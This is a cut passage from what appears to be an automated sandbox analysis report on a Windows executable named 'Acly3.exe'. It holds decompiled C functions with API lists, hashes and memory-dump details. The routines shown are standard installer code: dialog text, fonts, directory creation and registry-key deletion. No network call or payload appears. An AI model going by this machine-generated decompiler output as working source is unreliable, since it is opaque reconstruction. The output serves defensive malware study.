                                                                            						goto L34;
                                                                            					}
                                                                            				}
                                                                            				L37:
                                                                            				return 0;
                                                                            			}








                                                                            0x00402760
                                                                            0x00000000
                                                                            0x0040282c
                                                                            0x0040282c
                                                                            0x0040282f
                                                                            0x00402838
                                                                            0x00000000
                                                                            0x0040272f
                                                                            0x0040271a
                                                                            0x00402c33
                                                                            0x00402c39

                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                              • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                            • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                            • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                            • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040559F(signed int _a4, WCHAR* _a8) {
                                                                            				struct HWND__* _v8;
                                                                            				signed int _v12;
                                                                            				WCHAR* _v32;
                                                                            				long _v44;
                                                                            				int _v48;
                                                                            				void* _v52;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				WCHAR* _t27;
                                                                            				signed int _t28;
                                                                            				long _t29;
                                                                            				signed int _t37;
                                                                            				signed int _t38;
                                                                            
                                                                            				_t27 =  *0x433ee4;
                                                                            				_v8 = _t27;
                                                                            				if(_t27 != 0) {
                                                                            					_t37 =  *0x434fb4;
                                                                            					_v12 = _t37;
                                                                            					_t38 = _t37 & 0x00000001;
                                                                            					if(_t38 == 0) {
                                                                            						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                                            					}
                                                                            					_t27 = lstrlenW(0x42c248);
                                                                            					_a4 = _t27;
                                                                            					if(_a8 == 0) {
                                                                            						L6:
                                                                            						if((_v12 & 0x00000004) == 0) {
                                                                            							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
                                                                            						}
                                                                            						if((_v12 & 0x00000002) == 0) {
                                                                            							_v32 = 0x42c248;
                                                                            							_v52 = 1;
                                                                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                                            							_v44 = 0;
                                                                            							_v48 = _t29 - _t38;
                                                                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                                            						}
                                                                            						if(_t38 != 0) {
                                                                            							_t28 = _a4;
                                                                            							0x42c248[_t28] = 0;
                                                                            							return _t28;
                                                                            						}
                                                                            					} else {
                                                                            						_t27 = lstrlenW(_a8) + _a4;
                                                                            						if(_t27 < 0x1000) {
                                                                            							_t27 = lstrcatW(0x42c248, _a8);
                                                                            							goto L6;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t27;
                                                                            			}


















                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                            • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                            • lstrcatW.KERNEL32 ref: 004055FA
                                                                            • SetWindowTextW.USER32 ref: 0040560C
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                            • String ID:
                                                                            • API String ID: 1495540970-0
                                                                            • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                            • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                            • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                            • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E004067C4(WCHAR* _a4) {
                                                                            				short _t5;
                                                                            				short _t7;
                                                                            				WCHAR* _t19;
                                                                            				WCHAR* _t20;
                                                                            				WCHAR* _t21;
                                                                            
                                                                            				_t20 = _a4;
                                                                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                            					_t20 =  &(_t20[4]);
                                                                            				}
                                                                            				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                                            					_t20 =  &(_t20[2]);
                                                                            				}
                                                                            				_t5 =  *_t20;
                                                                            				_t21 = _t20;
                                                                            				_t19 = _t20;
                                                                            				if(_t5 != 0) {
                                                                            					do {
                                                                            						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                                            							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                            							_t19 = CharNextW(_t19);
                                                                            						}
                                                                            						_t20 = CharNextW(_t20);
                                                                            						_t5 =  *_t20;
                                                                            					} while (_t5 != 0);
                                                                            				}
                                                                            				 *_t19 =  *_t19 & 0x00000000;
                                                                            				while(1) {
                                                                            					_push(_t19);
                                                                            					_push(_t21);
                                                                            					_t19 = CharPrevW();
                                                                            					_t7 =  *_t19;
                                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                            						break;
                                                                            					}
                                                                            					 *_t19 =  *_t19 & 0x00000000;
                                                                            					if(_t21 < _t19) {
                                                                            						continue;
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				return _t7;
                                                                            			}









                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-3083651966
                                                                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                            • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                            • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                                            				long _v8;
                                                                            				signed char _v12;
                                                                            				unsigned int _v16;
                                                                            				void* _v20;
                                                                            				intOrPtr _v24;
                                                                            				long _v56;
                                                                            				void* _v60;
                                                                            				long _t15;
                                                                            				unsigned int _t19;
                                                                            				signed int _t25;
                                                                            				struct HWND__* _t28;
                                                                            
                                                                            				_t28 = _a4;
                                                                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                            				if(_a8 == 0) {
                                                                            					L4:
                                                                            					_v56 = _t15;
                                                                            					_v60 = 4;
                                                                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                            					return _v24;
                                                                            				}
                                                                            				_t19 = GetMessagePos();
                                                                            				_v16 = _t19 >> 0x10;
                                                                            				_v20 = _t19;
                                                                            				ScreenToClient(_t28,  &_v20);
                                                                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                            					_t15 = _v8;
                                                                            					goto L4;
                                                                            				}
                                                                            				return _t25 | 0xffffffff;
                                                                            			}














                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                            • GetMessagePos.USER32 ref: 00404E77
                                                                            • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                            • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                            • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                            				short _v132;
                                                                            				int _t11;
                                                                            				int _t20;
                                                                            
                                                                            				if(_a8 == 0x110) {
                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                            					_a8 = 0x113;
                                                                            				}
                                                                            				if(_a8 == 0x113) {
                                                                            					_t20 =  *0x41ea18; // 0x20207
                                                                            					_t11 =  *0x42aa24; // 0x2020b
                                                                            					if(_t20 >= _t11) {
                                                                            						_t20 = _t11;
                                                                            					}
                                                                            					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                            					SetWindowTextW(_a4,  &_v132);
                                                                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                            				}
                                                                            				return 0;
                                                                            			}






                                                                            APIs
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 00402FE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                            • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                            • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                            • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            			E00402950(int __ebx, void* __eflags) {
                                                                            				WCHAR* _t26;
                                                                            				void* _t29;
                                                                            				long _t37;
                                                                            				int _t49;
                                                                            				void* _t52;
                                                                            				void* _t54;
                                                                            				void* _t56;
                                                                            				void* _t59;
                                                                            				void* _t60;
                                                                            				void* _t61;
                                                                            
                                                                            				_t49 = __ebx;
                                                                            				_t52 = 0xfffffd66;
                                                                            				_t26 = E00402DA6(0xfffffff0);
                                                                            				_t55 = _t26;
                                                                            				 *(_t61 - 0x40) = _t26;
                                                                            				if(E00405E83(_t26) == 0) {
                                                                            					E00402DA6(0xffffffed);
                                                                            				}
                                                                            				E00406008(_t55);
                                                                            				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                                            				 *(_t61 + 8) = _t29;
                                                                            				if(_t29 != 0xffffffff) {
                                                                            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                            					if( *(_t61 - 0x28) != _t49) {
                                                                            						_t37 =  *0x434f14;
                                                                            						 *(_t61 - 0x44) = _t37;
                                                                            						_t54 = GlobalAlloc(0x40, _t37);
                                                                            						if(_t54 != _t49) {
                                                                            							E004034E5(_t49);
                                                                            							E004034CF(_t54,  *(_t61 - 0x44));
                                                                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                            							 *(_t61 - 0x10) = _t59;
                                                                            							if(_t59 != _t49) {
                                                                            								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                            								while( *_t59 != _t49) {
                                                                            									_t60 = _t59 + 8;
                                                                            									 *(_t61 - 0x3c) =  *_t59;
                                                                            									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                            									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                            								}
                                                                            								GlobalFree( *(_t61 - 0x10));
                                                                            							}
                                                                            							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                            							GlobalFree(_t54);
                                                                            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                            						}
                                                                            					}
                                                                            					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                            					CloseHandle( *(_t61 + 8));
                                                                            				}
                                                                            				_t56 = 0xfffffff3;
                                                                            				if(_t52 < _t49) {
                                                                            					_t56 = 0xffffffef;
                                                                            					DeleteFileW( *(_t61 - 0x40));
                                                                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                            				}
                                                                            				_push(_t56);
                                                                            				E00401423();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                                            				return 0;
                                                                            			}













                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                            • CloseHandle.KERNEL32(?), ref: 00402A35
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                            • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                            • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                            • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405A6E(WCHAR* _a4) {
                                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                                            				long _t23;
                                                                            
                                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                            				_v36.Owner = 0x4083f8;
                                                                            				_v36.Group = 0x4083f8;
                                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                                            				_v36.Revision = 1;
                                                                            				_v36.Control = 4;
                                                                            				_v36.Dacl = 0x4083e8;
                                                                            				_v16.nLength = 0xc;
                                                                            				if(CreateDirectoryW(_a4,  &_v16) != 0) {
                                                                            					L1:
                                                                            					return 0;
                                                                            				}
                                                                            				_t23 = GetLastError();
                                                                            				if(_t23 == 0xb7) {
                                                                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					return GetLastError();
                                                                            				}
                                                                            				return _t23;
                                                                            			}







                                                                            APIs
                                                                            • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                            • GetLastError.KERNEL32 ref: 00405AC5
                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                            • GetLastError.KERNEL32 ref: 00405AE4
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3449924974-4017390910
                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                            • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                            • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
                                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                            				void* _v8;
                                                                            				int _v12;
                                                                            				short _v536;
                                                                            				void* _t27;
                                                                            				signed int _t33;
                                                                            				intOrPtr* _t35;
                                                                            				signed int _t45;
                                                                            				signed int _t46;
                                                                            				signed int _t47;
                                                                            
                                                                            				_t46 = _a12;
                                                                            				_t47 = _t46 & 0x00000300;
                                                                            				_t45 = _t46 & 0x00000001;
                                                                            				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                            				if(_t27 == 0) {
                                                                            					if((_a12 & 0x00000002) == 0) {
                                                                            						L3:
                                                                            						_push(0x105);
                                                                            						_push( &_v536);
                                                                            						_push(0);
                                                                            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                            							__eflags = _t45;
                                                                            							if(__eflags != 0) {
                                                                            								L10:
                                                                            								RegCloseKey(_v8);
                                                                            								return 0x3eb;
                                                                            							}
                                                                            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                            							__eflags = _t33;
                                                                            							if(_t33 != 0) {
                                                                            								break;
                                                                            							}
                                                                            							_push(0x105);
                                                                            							_push( &_v536);
                                                                            							_push(_t45);
                                                                            						}
                                                                            						RegCloseKey(_v8);
                                                                            						_t35 = E0040690A(3);
                                                                            						if(_t35 != 0) {
                                                                            							return  *_t35(_a4, _a8, _t47, 0);
                                                                            						}
                                                                            						return RegDeleteKeyW(_a4, _a8);
                                                                            					}
                                                                            					_v12 = 0;
                                                                            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                            						goto L10;
                                                                            					}
                                                                            					goto L3;
                                                                            				}
                                                                            				return _t27;
                                                                            			}













                                                                            APIs
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                            • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                            • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                            • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E00401D81(void* __ebx, void* __edx) {
                                                                            				struct HWND__* _t30;
                                                                            				WCHAR* _t38;
                                                                            				void* _t48;
                                                                            				void* _t53;
                                                                            				signed int _t55;
                                                                            				signed int _t60;
                                                                            				long _t63;
                                                                            				void* _t65;
                                                                            
                                                                            				_t53 = __ebx;
                                                                            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                            				} else {
                                                                            					E00402D84(2);
                                                                            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                            				}
                                                                            				_t55 =  *(_t65 - 0x24);
                                                                            				 *(_t65 + 8) = _t30;
                                                                            				_t60 = _t55 & 0x00000004;
                                                                            				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                            				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                            				if((_t55 & 0x00010000) == 0) {
                                                                            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                            				} else {
                                                                            					_t38 = E00402DA6(0x11);
                                                                            				}
                                                                            				 *(_t65 - 0x44) = _t38;
                                                                            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                            				asm("sbb esi, esi");
                                                                            				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                            					DeleteObject(_t48);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                            					_push(_t63);
                                                                            					E00406484();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                            • GetClientRect.USER32 ref: 00401DE5
                                                                            • LoadImageW.USER32 ref: 00401E15
                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                            • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                            • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                            • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 73%
                                                                            			E00401E4E(intOrPtr __edx) {
                                                                            				void* __edi;
                                                                            				int _t9;
                                                                            				signed char _t15;
                                                                            				struct HFONT__* _t18;
                                                                            				intOrPtr _t30;
                                                                            				void* _t31;
                                                                            				struct HDC__* _t33;
                                                                            				void* _t35;
                                                                            
                                                                            				_t30 = __edx;
                                                                            				_t33 = GetDC( *(_t35 - 8));
                                                                            				_t9 = E00402D84(2);
                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                            				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                            				ReleaseDC( *(_t35 - 8), _t33);
                                                                            				 *0x40ce00 = E00402D84(3);
                                                                            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                            				 *0x40ce07 = 1;
                                                                            				 *0x40ce04 = _t15 & 0x00000001;
                                                                            				 *0x40ce05 = _t15 & 0x00000002;
                                                                            				 *0x40ce06 = _t15 & 0x00000004;
                                                                            				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                            				_t18 = CreateFontIndirectW(0x40cdf0);
                                                                            				_push(_t18);
                                                                            				_push(_t31);
                                                                            				E00406484();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                            				return 0;
                                                                            			}











                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                            • MulDiv.KERNEL32 ref: 00401E73
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2584051700-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                            				char _v68;
                                                                            				char _v132;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t23;
                                                                            				signed int _t24;
                                                                            				void* _t31;
                                                                            				void* _t33;
                                                                            				void* _t34;
                                                                            				void* _t44;
                                                                            				signed int _t46;
                                                                            				signed int _t50;
                                                                            				signed int _t52;
                                                                            				signed int _t53;
                                                                            				signed int _t55;
                                                                            
                                                                            				_t23 = _a16;
                                                                            				_t53 = _a12;
                                                                            				_t44 = 0xffffffdc;
                                                                            				if(_t23 == 0) {
                                                                            					_push(0x14);
                                                                            					_pop(0);
                                                                            					_t24 = _t53;
                                                                            					if(_t53 < 0x100000) {
                                                                            						_push(0xa);
                                                                            						_pop(0);
                                                                            						_t44 = 0xffffffdd;
                                                                            					}
                                                                            					if(_t53 < 0x400) {
                                                                            						_t44 = 0xffffffde;
                                                                            					}
                                                                            					if(_t53 < 0xffff3333) {
